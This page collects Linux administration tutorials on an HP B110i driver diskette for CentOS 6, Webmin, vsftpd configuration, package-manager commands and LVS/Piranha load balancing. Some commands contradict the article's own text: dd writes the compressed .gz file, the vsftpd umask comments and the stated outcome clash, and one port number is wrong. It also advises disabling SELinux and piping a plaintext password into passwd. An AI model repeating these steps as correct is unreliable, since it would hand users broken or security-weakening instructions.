For this article we are providing as a direct download, drivers for RedHat Enterprise Linux & CentOS v6.0 for Intel and AMD 64bit processors (x86-64bit). These files are available at our Linux download section.

 If a diskette driver for earlier or later systems is required, we advise to visit HP’s website and search for the term “Driver Diskette for HP Smart Array B110i” which will produce a good amount of results for all operating systems.

Driver diskette file names have the format “hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz” where rhel represents the operating system (RedHat Enterprise Linux), 6u0 stands for update 0 (version 6, update 0 = 6.0) and x86_64 for the system architecture covering x86 platforms (Intel & AMD).

Writing Image To Floppy Disk Or USB Flash

The driver diskette must be uncompressed using a utility such as 7zip (freely available). Uncompressing the file reveals the file dd.img . This is the driver disk image that needs to be written to a floppy disk drive or USB flash.

Linux users can use the following command to create their driver diskette. Keep in mind to substitute /dev/sdb to reflect your usb or floppy drive:

# dd if=hpahcisr-1.2.6-11.rhel6u0.x86_64.dd.gz of=/dev/sdb

Windows users can use RawWrite if they wish to write it to a floppy disk drive or Win32DiskImager to write it to a USB Flash. Both utilities are provided with our disk driver download. Since we had a USB floppy disk drive in hand, we selected RawWrite:

rawwrite usage and screenshot

Loading The Driver Diskette

With the driver diskette ready, it’s time to begin the CentOS installation, by booting from the DVD:

centos 6.0 welcome installation

At the installation menu, hit ESC to receive the boot: prompt. At the prompt, enter the following command: linux dd blacklist=ahci and hit enter to being installation as shown below:

centos 6 initrd.img driver installation

The initial screen of the installation GUI will allow you to load the driver diskette created. At the question, select Yes and hit enter:

linux-b110i-installation-6

Next screen instructs to insert the driver disk into /dev/sda and press OK.  The location /dev/sda refers to our USB Floppy drive, connected to one of our HP server's USB ports during bootup:

linux-b110i-installation-7

The system will present a screen with the message Reading driver disk, indicating the driver is loading and once complete, the message detecting hardware … waiting for hardware to initialize… will appear:

linux-b110i-installation-8

Finally, the installation procedure asks if you wish you load any more driver disks. We answered No and the installation procedure continued as expected. We saw both logical disks and were able to successfully install and use them without any problem:

linux centos logical drive setup

We hope this brief article will help thousands of engineers around the world save a bit of their valuable time!

  • Hits: 99563

Installing & Configuring Linux Webmin - Linux Web-Based Administration

For many engineers and administrators,  maintaining a Linux system can be a daunting task, especially if there’s limited time or experience.  Working in shell mode, editing files, restarting services, performing installations, configuring scheduled jobs (Cron Jobs) and much more, requires time, knowledge and patience.

One of the biggest challenges for people who are new to Linux, is to work with the operating system in an easy and manageable way, without requiring to know all the commands and file paths in order to get the job done.

All this has now changed, and you can now do all the above, plus a lot more, with a few simple clicks through an easy-to-follow web interface.  Sounds too good to be true?  Believe it or not, it is true!  It's time to get introduced to ‘Webmin’.

Webmin is a freeware program that provides web-based interface for system administration and is a system configuration tool for administrators. One of Webmin's strongest points is that it is modular, which means there are hundreds of extra modules/addons that can be installed, to provide the ability to control additional programs or services someone might want to install on their Linux system.

Here are just a few of the features supported by Webmin, out of the box:

  • Setup and administer user accounts
  • Setup and administer groups
  • Setup and configure DNS services
  • Configure file sharing & related services (Samba)
  • Setup your Internet connection (including ADSL router, modem etc)
  • Configure your Apache webserver
  • Configure a FTP Server
  • Setup and configure an email server
  • Configure Cron Jobs
  • Mount, dismount and administer volumes, hdd's and partitions
  • Setup system quotas for your users
  • Built-in file manager
  • Manage an OpenLDAP server
  • Setup and configure VPN clients
  • Setup and configure a DHCP Server
  • Configure a SSH Server
  • Setup and configure a Linux Proxy server (squid) with all supported options
  • Setup and configure a Linux Firewall
  • and much much more!!!

The great part is that webmin is supported on all Linux platforms and is extremely easy to install.  While our example is based on Webmin's installation on a Fedora 16 server using the RPM package, these steps will also work on other versions such as Red Hat, CentOS and other Linux distributions.

Before we dive into Webmin, let's take a quick look at what we've got covered:

  • Webmin Installation
  • Adding Users, Groups and Assigning Privileges
  • Listing and Working with File Systems on the System
  • Creating and Editing Disk Quotas for Unix Users
  • Editing the System Boot up, Adding and Removing Services
  • Managing and Examining System Log Files
  • Setting up and Changing System Timezone and Date
  • Managing DNS Server & Domain
  • Configuring DHCP Server and Options
  • Configuring FTP Server and Users/Groups
  • How to Schedule a Backup
  • Configuring CRON Jobs with Webmin
  • Configuring SSH Server with Webmin
  • Configuring Squid Proxy Server
  • Configuring Apache HTTP Server

Installing Webmin On Linux Fedora / Redhat / CentOS

Download the required RPM file from http://download.webmin.com/download/yum/ using the command (note the root status):

# wget http://download.webmin.com/download/yum/webmin-1.580-1.noarch.rpm

Install the RPM file of Webmin with the following command:

# rpm -Uvh webmin-1.580-1.noarch.rpm

Start Webmin service using the command:

# systemctl start webmin.service

You can now login to https://Fedora-16:10000/ as root with your root password. To ensure you are able to login into your webmin administration interface, simply use the following URL:  https://your-linux-ip:10000 , where "your-linux-ip" is your Linux server's or workstation's IP address.

Running Webmin

Open Firefox or any other browser, and type the URL https://Fedora-16:10000/ :

linux-webmin-1

 

You will be greeted with a welcome screen. Login as root with your root password. Once you are logged in, you should see the system information:

linux-webmin-2

Adding Users, Groups And Assigning Them Privileges

Expand the "System" Tab in the left column index, and select the last entry “Users and Groups”.  You will be shown the list of the "Local Users" on the system:

linux-webmin-3

You can add users or delete them from this window. If you want to change the parameters of any user, you can do so. By clicking on any user, you can see the groups and privileges assigned to them. These can be changed as you like. For example, if you select the user "root", you can see all the details of the user as shown below :

linux-webmin-4

By selecting the adjacent tab in the "Users and Groups" window, you can see the "Local Groups" as well:

linux-webmin-5

Here, you can see the members in each group by selecting that group. You can delete a group or add a new one. You can select who will be the member of the group, and who can be removed from a group. For example, you can see all the members in the group "mem", if you select and open it:

linux-webmin-6

Here, you will be allowed to create a new group or delete selected groups. You can also add users to the groups or delete them as required. If required, you can also change group ID on files and modify a group other modules as well.

Listing And Working With File Systems On The System

By selecting "Disk and Network Filesystems" under the "System" tab on the left index, you can see the different file systems currently mounted.

linux-webmin-7

You can select other type of file system you would like to mount. Select it from the drop down menus as shown:

linux-webmin-8

By selecting a mounted file system, you can edit its details such as whether it should be mounted at boot time, left as mounted or unmount it now, check the file system at boot time. Mount options like read-only, executable, permissions can be set here.

Creating And Editing Disk Quotas For Unix Users

Prior to Linux Installation, a major & key point in Linux Partition is the /home directory.

VHost is widely setup on almost all control panel mechanism on /home location, since Users & Groups, FTP server, User shell, Apache and several other directives are constructed on this /home partition. Therefore, home should be created as a Logical Volume on a Linux native File system (ext3). Here it is assumed there is already a /home partition on the system.

You can set the quotas by selecting “Disk & Network Filesystems” under “System”:

linux-webmin-9

This allows you to create and edit disk quota for the users in your /home partition or directory. Each user is given a certain amount of disk space he can use. Going close to filling up the quota will generally send a warning.

You can also edit other mounts such as the root directory "/" and also set a number of presented mount options:

linux-webmin-10

Editing The System Boot Up, Adding And Removing Services

All Systemd services are neatly listed in the "Bootup and Shutdown" section within "System":

linux-webmin-11

All service related functions such as start, stop, restart, start on boot, disable on boot, start now and on boot, and disable now and on boot are available at the bottom of the screen. This makes system bootup process modification a breeze, even for the less experienced:

linux-webmin-12

 The "Reboot System" and "Shutdown System" function buttons are also located at the bottom, allowing the immediately reboot or shutdown the system.

Managing And Examining System Log Files

Who would have thought managing system log files in Linux would be so easy? Webmin provides a dedicated section allowing the admnistrator to make a number of changes to the preferences of each system's log file. The friendly interface will show you all available system log files and their location.  By clicking on the one of interest, you can see its properties and make the changes you require.

The following screenshot shows the "System Logs" listed in the index under "System" menu option:

linux-webmin-13

All the logs are available for viewing and to editing. The screenshot below shows an example of editing the maillog. Through the interface, you can enable, disable logs and make a number of other changes on the fly:

linux-webmin-14

Another entry under "System" is the important function of "Log File Rotation". This allows you to edit which log file you would like to rotate and how (daily, weekly or monthly). You can define what command will be executed after the log rotation is done. You can also delete the selected log rotations:

linux-webmin-15

Log rotation is very important, especially on a busy system as it will ensure the log files are kept to a reasonable and manageable size.

Setting Up And Changing System Timezone/Date

Webmin also supports setting up system time and date. To do so, you will have to go to "System Time" under "Hardware" in the main menu index.

linux-webmin-16

System time and hardware time can be separately set and saved. These can be made to match if required.

On the next tab you will be able to change the Timezone:

linux-webmin-17

The next tab is the 'Time Server Sync', used for synchronizing to a time-server. This will ensure your system is always in sync with the selected time-server:

linux-webmin-18

Here, you will be able to select a specific timeserver with a hostname or address and set the schedule when the periodic synchronizing will be done.

Managing DNS Server & Domain

DNS Server configuration is possible from the "Hostname and DNS Client", which is located under "Networking Configuration" within "Networking" in the index:

linux-webmin-19

Here you can set the Hostname of the machine, the IP Address of the DNS Servers and their search domains and save them.

Configuring DHCP Server And Options

For configuration of your system's DHCP server, go to “DHCP Server” within “System and Server Status” under “Others”:

linux-webmin-20

All parameters related to DHCP server can be set here:

linux-webmin-21

Configuring FTP Server And Users/Groups

For ProFTPD Server, select “ ProFTPD Server” under “Servers”. You will see the main menu for ProFTPD server:

linux-webmin-22

You can see and edit the Denied FTP Users if you select the "Denied FTP Users":

linux-webmin-23

Configuration file at /etc/proftpd.conf can be directly edited if you select the "Edit Config Files" in the main menu:

linux-webmin-24

How To Schedule A Backup

Whatever the configuration files you would like to backup, schedule and restore, can be done from “Backup Configuration Files” under “Webmin”.

In the “Backup Now” window, you can set the modules, the backup destination, and what you want included in the backup.   The backup can be a local file on the system, a file on an FTP server, or a file on an SSH server. For both the servers, you will have to provide the username and password. Anything else that you would like to include during the backup such as webmin module configuration files, server configuration files, or other listed files can also be mentioned here:

linux-webmin-25

If you want to schedule your Backups go to the next tab “Scheduled Backups” and select the “Add a new scheduled backup”, since, as shown, no scheduled backup has been defined yet:

linux-webmin-26

 

linux-webmin-27

And set the exact backup schedule options. The information is nearly same as that for the Backup Now. However, now you have the choice for setting the options for the schedule, such as Months, Weekdays, Days, Hours, Minutes and Seconds.

linux-webmin-28

 Restoration of modules can be selected from the “Restore Now” tab:

linux-webmin-29

The options for restore now follow the same pattern as for the backup. You have the options for restoring from a local file, an FTP server, an SSH server, and an uploaded file. Apart from providing the username and passwords for the servers, you have the option of only viewing what is going to be restored, without applying the changes.

Configuring CRON Jobs With Webmin

Selecting the “Scheduled Cron Jobs” under “System” will allow creation, deletion, disabling and enabling of Cron jobs, as well as controlling user access to cron jobs. The interface also shows the users who are active and their current cron-jobs. The jobs can be selectively deleted, disabled or enabled (if disabled earlier).

linux-webmin-30

For creating a new cron job and scheduling it, select the tab “Create a new scheduled cron job”. You have the options of setting the Months, Weekdays, Days, Hours, Minutes. You have the option of running the job on any date, or running it only between two fixed dates:

linux-webmin-31

For controlling access to Cron jobs, select the next tab “Control User Access to Cron Jobs” in the main menu:

linux-webmin-32

Configuring SSH Server With Webmin

Selecting “SSH Server” under “Servers” will allow all configuration of the SSH Server:

linux-webmin-33

Access Control is provided by selecting the option "Access Control" from the main menu :

linux-webmin-34

Miscellaneous options are available when the "Miscellaneous Options" is selected from the main menu:

linux-webmin-35

The SSH config files can be accessed directly and edited by selecting “Edit Config Files” from the main menu.

linux-webmin-36

Configuring Squid Proxy Server

Select “Squid Proxy Server” under “Servers”. The main menu shows what all can be controlled there:

linux-webmin-37

The Access Control allows ACL, Proxy restrictions, ICP restrictions, External ACL programs, and Reply proxy restrictions, when you select “Access Control”:

linux-webmin-38

 

linux-webmin-39

Configuring Apache HTTP Server

You can configure “Apache Webserver” under “Servers”. The main menu shows what you can configure there.

All Global configuration can be done from the first tab:

linux-webmin-40

You can also configure the existing virtual hosts or create a virtual host, if you select the other tabs:

linux-webmin-41

Users and Groups who are allowed to run Apache are mentioned here (select from the main menu):

linux-webmin-42

Apache configuration files can be directly edited from the main menu.

All the configuration files, httpd.conf, sarg.conf, squid.conf, and welcome.conf can be directly edited from this interface:

linux-webmin-43

Any other service or application, which you are not able to locate directly from the index on the left, can be searched by entering in the search box on the left. If the item searched is not installed, Webmin will offer to download the RPM and install it. A corresponding entry will appear in the index on the left and you can proceed to configure the service or application. After installing an application or service, modules can be refreshed as well. From the Webmin interface, you can also view the module's logs.

  • Hits: 108633

Installing & Configuring VSFTPD FTP Server for Redhat Enterprise Linux, CentOS & Fedora

Vsftpd is a popular FTP server for Unix/Linux systems. For thoes unaware of the vsftpd ftp server, note that this is not just another ftp server, but a mature product that has been around for over 12 years in the Unix world. While Vsftpd it is found as an installation option on many Linux distributions, it is not often Linux system administrators are seeking for installation and configuration instructions for it, which is the reason we decide to cover it on Firewall.cx.

This article focuses on the installation and setup of the Vsftpd service on Linux Redhat Enterprise, Fedora and CentOS, however it is applicable to almost all other Linux distributions.  We'll also take a look at a number of great tips which include setting quotas, restricting access to anonymous users, disabling uploads, setting a dedicated partition for the FTP service, configuring the system's IPTable firewall and much more.

VSFTPD Features

Following is a list of vsftpd's features which confirms this small FTP package is capable of delivering a lot more than most FTP servers out there:

  • Virtual IP configurations
  • Virtual users
  • Standalone or inetd operation
  • Powerful per-user configurability
  • Bandwidth throttling
  • Per-source-IP configurability
  • Per-source-IP limits
  • IPv6
  • Encryption support through SSL integration
  • and much more....!

Installing The VSFTPD Linux Server

To initiate the installation of the vsftpd package, simply open your CLI prompt and use the yum command (you need root privileges) as shown below:

# yum install vsftpd

Yum will automatically locate, download and install the latest vsftpd version.

Configure VSFTPD Server

To open the configuration file, type:

# vi /etc/vsftpd/vsftpd.conf

Turn off standard ftpd xferlog log format and turn on verbose vsftpd log format by making the following changes in the vsftpd.conf file:

xferlog_std_format=NO
log_ftp_protocol=YES
Note: the default vsftpd log file is /var/log/vsftpd.log.

Above two directives will enable logging of all FTP transactions.

To lock down users to their home directories:

chroot_local_user=YES

You can create warning banners for all FTP users, by defining the path:

banner_file=/etc/vsftpd/issue

Now you can create the /etc/vsftpd/issue file with a message compliant with the local site policy or a legal disclaimer:

“NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address”.

Turn On VFSTPD Service

Turn on vsftpd on boot:

# systemctl enable vsftpd@.service

Start the service:

# systemctl start This email address is being protected from spambots. You need JavaScript enabled to view it.

You can verify the service is running and listening on the correct port using the following command:

# netstat -tulpn | grep :21

Here's the expected output:

tcp   0  0 0.0.0.0:21  0.0.0.0:*   LISTEN   LISTEN 9734/vsftpd

Configure IPtables To Protect The FTP Server

In case IPTables are configured on the system, it will be necessary to edit the iptables file and open the ports used by FTP to ensure the service's operation.

To open file /etc/sysconfig/iptables, enter:

# vi /etc/sysconfig/iptables

Add the following lines, ensuring that they appear before the final LOG and DROP lines for the RH-Firewall-1-INPUT:

-A RH-Firewall-1-INPUT -m state --state NEW -p tcp --dport 21 -j ACCEPT

Next, open file /etc/sysconfig/iptables-config, and enter:

# vi /etc/sysconfig/iptables-config

Ensure that the space-separated list of modules contains the FTP connection-tracking module:

IPTABLES_MODULES="ip_conntrack_ftp"

Save and close the file and finally restart the firewall using the following commands:

# systemctl restart iptables.service
# systemctl restart ip6tables.service

Tip: View FTP Log File

Type the following command:

# tail -f /var/log/vsftpd.log

Tip: Restricting Access to Anonymous User Only

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

local_enable=NO

Tip: To Disable FTP Uploads

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

write_enable=NO

Tip: To Enable Disk Quota

Disk quota must be enabled to prevent users from filling a disk used by FTP upload services. Edit the vsftpd configuration file. Add or correct the following configuration options to represents a directory which vsftpd will try to change into after an anonymous login:

anon_root=/ftp/ftp/pub

The ftp users are the same users as those on the hosting machine.

You could have a separate group for ftp users, to help keep their privileges down (for example 'anonftpusers'). Knowing that, your script should do:

useradd -d /www/htdocs/hosted/bob -g anonftpusers -s /sbin/nologin bob
echo bobspassword | passwd --stdin bob
echo bob >> /etc/vsftpd/user_list

Be extremely careful with your scripts, as they will have to be run as root.

However, for this to work you will have to have the following options enabled in /etc/vsftpd/vsftpd.conf

userlist_enable=YES
userlist_deny=NO

Security Tip: Place The FTP Directory On Its Own Partition

Separation of the operating system files from FTP users files may result into a better and secure system. Restricting the growth of certain file systems is possible using various techniques. For example, use /ftp partition to store all ftp home directories and mount ftp with nosuid, nodev and noexec options. A sample /etc/fstab entry:

/dev/sda5  /ftp  ext3  defaults,nosuid,nodev,noexec,usrquota 1 2

Example File For vsftpd.conf

Following is an example for vsftpd.conf. It allows the users listed in the user_list file to log in, no anonymous users, and quite tight restrictions on what users can do:

# Allow anonymous FTP?
anonymous_enable=NO
#
# Allow local users to log in?
local_enable=YES
#
# Allow any form of FTP write command.
write_enable=YES
#
# To make files uploaded by your users writable by only
# themselves, but readable by everyone and if, through some
# misconfiguration, an anonymous user manages to upload a file, # the file will have no read, write or execute permission. Just to be # safe. 
local_umask=0000
file_open_mode=0644
anon_umask=0777
#
# Allow the anonymous FTP user to upload files?
anon_upload_enable=NO
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=NO
#
# Activate logging of uploads/downloads?
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data)?
connect_from_port_20=YES
#
# Log file in standard ftpd xferlog format?
xferlog_std_format=NO
#
# User for vsftpd to run as?
nopriv_user=vsftpd
#
# Login banner string:
ftpd_banner= NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address.
#
# chroot local users (only allow users to see their directory)?
chroot_local_user=YES
#
# PAM service name?
pam_service_name=vsftpd
#
# Enable user_list (see next option)?
userlist_enable=YES
#
# Should the user_list file specify users to deny(=YES) or to allow(=NO)
userlist_deny=NO
#
# Standalone (not run through xinetd) listen mode?
listen=YES
#
#
tcp_wrappers=NO
#
# Log all ftp actions (not just transfers)?
log_ftp_protocol=YES
# Initially YES for trouble shooting, later change to NO
#
# Show file ownership as ftp:ftp instead of real users?
hide_ids=YES
#
# Allow ftp users to change permissions of files?
chmod_enable=NO
#
# Use local time?
use_localtime=YES
#
# List of raw FTP commands, which are allowed (some commands may be a security hazard):
cmds_allowed=ABOR,QUIT,LIST,PASV,RETR,CWD,STOR,TYPE,PWD,SIZE,NLST,PORT,SYST,PRET,MDTM,DEL,MKD,RMD

With this config, uploaded files are not readable or executable by anyone, so the server is acting as a 'dropbox'. Change the file_open_modeoption to change that.

Lastly, it is also advised to have a look at 'man vsftpd.conf' for a full list and description of all options.

  • Hits: 188948

Updating Your Linux Server - How to Update Linux Workstations and Operating Systems

Like any other software, an operating system needs to be updated. Updates are required not only because of the new hardware coming into the market, but also for improving the overall performance and taking care of security issues.

Updates are usually done in two distinct ways. One is called the incremental update, and the other is the major update. In the incremental updates, components of the operating system undergo minor modifications. Such modifications are usually informed to users over the net. Users can download and install the modifications serially using the update managing software.

However, some major modifications require so many changes involving several packages simultaneously, it becomes rather complicated to accomplish serially over the net. This type of modification is best done by a fresh installation, after acquiring the improved version of the operating system.

Package management is one of the most distinctive features distinguishing major Linux distributions. Major projects offer a graphical user interface where users can select a package and install it with a mouse click. These programs are front-ends to the low-level utilities to manage the tasks associated with installing packages on a Linux system. Although many desktop Linux users feel comfortable installing packages through these GUI tools, the command-line package management offers two excellent features not available in any graphical package management utility, and that is power and speed.

The Linux world is sharply divided into three major groups, each swearing by the type of package management they use - the “RPM” group, the “DEB” group and the “Slackware” group. There are other fragment groups using different package management types, but they are insignificantly minor in comparison. Among the three groups, RPM and DEB are by far the most popular and several other groups have been derived from them. Some of the Linux distributions that handle these package managements are:

RPM - RedHat Enterprise/Fedora/CentOS/OpenSUSE/Mandriva, etc.

DEB - Debian/Ubuntu/Mint/Knoppix, etc.

RPM - RedHat Package Manager

Although RPM was originally used by RedHat, this package management is handled by different types of package management tools specific to each Linux distribution. While OpenSUSE uses the “zypp” package management utility, RedHat Enterprise Linux (REL), Fedora and CentOS use “yum”, and Mandriva and Mageia use “urpmi”.

Therefore, if you are an OpenSUSE user, you will use the following commands:

For updating your package list: zypper refresh

For upgrading your system: zypper update

For installing new software pkg: zypper install pkg (from package repository)

For installing new software pkg: zypper install pkg  (from package file)

For updating existing software pkg: zypper update -t package pkg

For removing unwanted software pkg: zypper remove pkg

For listing installed packages: zypper search -ls

For searching by file name: zypper wp file

For searching by pattern: zypper search -t pattern pattern

For searching by package name pkg: zypper search pkg

For listing repositories: zypper repos

For adding a repository: zypper addrepo pathname

For removing a repository: zypper removerepo name

 

If you are a Fedora or CentOS user, you will be using the following commands:

For updating your package list: yum check-update

For upgrading your system: yum update

For installing new software pkg: yum install pkg (from package repository)

For installing new software pkg: yum localinstall pkg (from package file)

For updating existing software pkg: yum update pkg

For removing unwanted software pkg: yum erase pkg

For listing installed packages: rpm -qa

For searching by file name: yum provides file

For searching by pattern: yum search pattern

For searching by package name pkg: yum list pkg

For listing repositories: yum repolist

For adding a repository: (add repo to /etc/yum.repos.d/)

For removing a repository: (remove repo from /etc/yum.repos.d/)

 

You may be a Mandriva or Mageia user, in which case, the commands you will use will be:

For updating your package list: urpmi update -a

For upgrading your system: urpmi --auto-select

For installing new software pkg: urpmi pkg (from package repository)

For installing new software pkg: urpmi pkg (from package file)

For updating existing software pkg: urpmi pkg

For removing unwanted software pkg: urpme pkg

For listing installed packages: rpm -qa

For searching by file name: urpmf file

For searching by pattern: urpmq --fuzzy pattern

For searching by package name pkg: urpmq pkg

For listing repositories: urpmq --list-media

For adding a repository: urpmi.addmedia name path

For removing a repository: urpmi.removemedia media

DEB - Debian Package Manager

Debian Package Manager was introduced by Debian and later adopted by all derivatives of Debian - Ubuntu, Mint, Knoppix, etc. This is a relatively simple and standardized set of tools, working across all the Debian derivatives. Therefore, if you use any of the distributions managed by the DEB package manager, you will be using the following commands:

For updating your package list: apt-get update

For upgrading your system: apt-get upgrade

For installing new software pkg: apt-get install pkg (from package repository)

For installing new software pkg: dpkg -i pkg (from package file)

For updating existing software pkg: apt-get install pkg

For removing unwanted software pkg: apt-get remove pkg

For listing installed package: dpkg -l

For searching by file name: apt-file search path

For searching by pattern: apt-cache search pattern

For searching by package name pkg: apt-cache search pkg

For listing repositories: cat /etc/apt/sources.list

For adding a repository: (edit /etc/apt/sources.list)

For removing a repository: (edit /etc/apt/sources.list)

  • Hits: 40812

Implementing Virtual Servers and Load Balancing Cluster System with Linux

What is Server Virtualization?

Server virtualization is the process of apportioning a physical server into several smaller virtual servers. During server virtualization, the resources of the server itself remain hidden. In fact, the resources are masked from users, and software is used for dividing the physical server into multiple virtual machines or environments, called virtual or private servers.

This technology is commonly used in Web servers. Virtual Web servers provide a very simple and popular way of offering low-cost web hosting services. Instead of using a separate computer for each server, dozens of virtual servers can co-exist on the same computer.

There are many benefits of server virtualization. For example, it allows each virtual server to run its own operating system. Each virtual server can be independently rebooted without disturbing the others. Because several servers run on the same hardware, less hardware is required for server virtualization, which saves a lot of money for the business. Since the process utilizes resources to the fullest, it saves on operational costs. Using a lower number of physical servers also reduces hardware maintenance.

In most cases, the customer does not observe any performance deficit and each web site behaves as if it is being served by a dedicated server. However, the resources of the computer being shared, if a large number of virtual servers reside on the same computer, or if one of the virtual servers starts to hog the resources, Web pages will be delivered more slowly.

There are several ways of creating virtual servers, with the most common being virtual machines, operating system-level virtualization, and paravirtual machines.

How Are Virtual Servers Helpful

The way Internet is exploding with information, it is playing an increasingly important role in our lives. Internet traffic is increasing dramatically, and has been growing at an annual rate of nearly 100%. The workload on the servers is simultaneously increasing significantly so that servers frequently become overloaded for short durations, especially for popular web sites.

To overcome the overloading problem of the servers, there are two solutions. You could have a single server solution, such as upgrading the server to a higher performance server. However, as requests increase, it will soon be overloaded, so that it has to be upgraded repeatedly. The upgrading process is complex and the cost is high.

The other is the multiple server solution, such as building a scalable network service system on a cluster of servers. As load increases, you can just add a new server or several new servers into the cluster to meet the increasing requests, and a virtual server running on commodity hardware offers the lowest cost to performance ratio. Therefore, for network services, the virtual server is a highly scalable and more cost-effective for building server cluster system.

Virtual Servers with Linux

Highly available server solutions are done by clustering. Cluster computing involves three distinct branches, of which two are addressed by RHEL or Red Hat Enterprise Linux:

Ø    Load balancing clusters using Linux Virtual Servers as specialized routing machines to dispatch traffic to a pool of servers.

Ø    Highly available or HA Clustering with Red Hat Cluster Manager that uses multiple machines to add an extra level of reliability for a group of services.

Load Balancing Cluster System Using RHEL Virtual Servers

When you access a website or a database application, you do not know if you are accessing a single server or a group of servers. To you, the Linux Virtual Server or LVS cluster appears as a single server. In reality, there is a cluster of two or more servers behind a pair or redundant LVS routers. These routers distribute the client requests evenly throughout the cluster system.

Administrators use Red Hat Enterprise Linux and commodity hardware to address availability requirements, and to create consistent and continuous access to all hosted services.

In its simplest form, an LVS cluster consists of two layers. In the first layer are two similarly configured cluster members, which are Linux machines. One of these machines is the LVS router and is configured to direct the requests from the internet to the servers. The LVS router balances the load on the real servers, which form the second layer. The real servers provide the critical services to the end-user. The second Linux machine acts as a monitor to the active router and assumes its role in the event of a failure.

The active router directs traffic from the internet to the real servers by making use of Network Address Translation or NAT. The real servers are connected to a dedicated network segment transfer all public traffic via the active LVS router. The outside world sees this entire cluster arrangement as a single entity.

LVS with NAT Routing

The active LVS router has two Network Interface Cards or NICs. One of the NICs is connected to the Internet and has a real IP address on the eth0 and a floating IP address aliased to eth0:1. The other NIC connects to the private network with a real IP address on the eth1, and a floating address aliased to eth1:1.

All the servers of the cluster are located on the private network and use the floating IP for the NAT router. They communicate with the active LVS router via the floating IP as their default route. This ensures their abilities for responding to requests from the inernet are not impaired.

When requests are received by the active LVS router, it routes the request to an appropriate server. The real server processes the request and returns the packets to the LVS router. Using NAT, the LVS router then replaces the address of the real server in the packets with the public IP address of the LVS router. This process is called IP Masquerading, and it hides the IP addresses of the real servers from the requesting clients.

Configuring LVS Routers with the Piranha Configuration Tool

The configuration file for an LVS cluster follows strict formatting rules. To prevent server failures because of syntax errors in the file lvs.cf, using the Piranha Configuration Tool is highly recommended. This tool provides a structured approach to creating the necessary configuration file for a Piranha cluster. The configuration file is located at /etc/sysconfig/ha/lvs.cf, and the configuration can be done with a web-based tool such as the Apache HTTP Server.

As an example, we will use the following settings:

LVS Router 1: eth0: 192.168.26.201

LVS Router 2: eth0: 192.168.26.202

Real Server 1: eth0: 192.168.26.211

Real Server 2: eth0: 192.168.26.212

VIP: 192.168.26.200

Gateway: 192.168.26.1

You will need to install piranha and ipvsadm packages on the LVS Routers:

# yum install ipvsadm

# yum install piranha

Start services on the LVS Routers with:

# chkconfig pulse on

# chkconfig piranha-gui on

# chkconfig httpd on

Set a Password for the Piranha Configuration Tool using the following commands: 

# piranha-passwd

Next, turn on Packet Forwarding on the LVS Routers with:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Starting the Piranha Configuration Tool Service

First you'll need to modify the mode SELinux in permissive mode with the use of the command:

# setenforce 0

# service httpd start

# service piranha-gui start

If this is not done, the system will most probably show the following error massage when the piranha-gui service is started:

Starting piranha-gui: (13)Permission denied: make_sock: could not bind to address [::]:3636

(13)Permission denied: make_sock: could not bind to address 0.0.0.0:3636
No listening sockets available, shutting down
Unable to open logs

Configure the LVS Routers with the Piranha Configuration Tool

The Piranha Configuration Tool runs on port 3636 by default. Open http://localhost:3626 or http://192.168.26.201:3636 in a Web browser to access the Piranha Configuration Tool. Click on the Login button and enter piranha for the Username and the administrative password you created, in the Password field:

linux-virtual-servers-1

Click on the GLOBAL SETTINGS panel, enter the primary server public IP, and click the ACCEPT button:

linux-virtual-servers-2

 Click on the REDUNDANCY panel, enter the redundant server public IP, and click the ACCEPT button:

linux-virtual-servers-3

 Click on the VIRTUAL SERVERS panel, add a server, edit it, and activate it:

linux-virtual-servers-4

linux-virtual-servers-5

Clicking on the REAL SERVER subsection link at the top of the panel displays the EDIT REAL SERVER subsection. Click the ADD button to add new servers, edit them and activate them:

linux-virtual-servers-6

Copy the lvs.cf file to another LVS router:

# scp /etc/sysconfig/ha/lvs.cf This email address is being protected from spambots. You need JavaScript enabled to view it.:/etc/sysconfig/ha/lvs.cf

Start the pulse services on the LVS Routers with the following command:

# service pulse restart

Testing the System

You can use the Apache HTTP server benchmarking tool (ab) to simulate a visit by the user.

HA Clustering With Red Hat Cluster Manager

When dealing with clusters, single point failures, unresponsive applications and nodes are some of the issues that increase the non-availability of the servers. Red Hat addresses these issues through their High Availability or HA Add-On servers. Centralised configurations and management are some of the best features of the Conga application of RHEL.

For delivering an extremely mature, high-performing, secure and lightweight high-availability server solution, RHEL implements the Totem Single Ring Ordering and Membership Protocol. Corosync is the cluster executive within the HA Add-On.

Kernel-based Virtual Machine Technology

RHEL uses the Linux kernel that has the virtualization characteristics built-in and makes use of the kernel-based virtual machine technology known as KVM. This makes RHEL perfectly suitable to run as either a host or a guest in any Enterprise Linux deployment. As a result, all Red Hat Enterprise Linux system management and security tools and certifications are part of the kernel and always available to the administrators, out of the box.

RHEL uses highly improved SCSI-3 PR reservations-based fencing. Fencing is the process for removing resources from the cluster node from being accessed when they have lost contact with the cluster. This prevents uncoordinated modification of shared storage thus protecting the resources.

Improvement in system flexibility and configuration is possible because RHEL allows manual specification of devices and keys for reservation and registration. Ordinarily, after fencing, the unconnected cluster mode would need to be rebooted to rejoin the cluster. RHEL unfencing makes it possible to re-enable access and startup of the node without administrative intervention.

Improved Cluster Configuration

LDAP, the Lightweight Directory Access Protocol provides improved cluster configuration system for load options. This provides better manageability and usability across the cluster by easily configuring, validating and synchronizing the reload. Virtualized KVM guests can be run as managed services.

RHEL Web interface to the cluster management and administration runs on TurboGears2 and provides a rich graphical user interface. This enables unified logging and debugging by administrators who can enable, capture and read cluster system logs using a single cluster configuration command.

Installing TurboGears2

The method of installing TurboGears2 depends on the platform and the level of experience. It is recommended to install TurboGears2 withing a virtual enviroment as this will prevent interference with the system's installed packages. Prerequisites for installation of TurboGears2 are Python, Setuptools, Database and Drivers, Virtualenv, Virtualenvwrapper and other dependencies.

linux-virtual-servers-7

  • Hits: 38489

Working with Linux TCP/IP Network Configuration Files

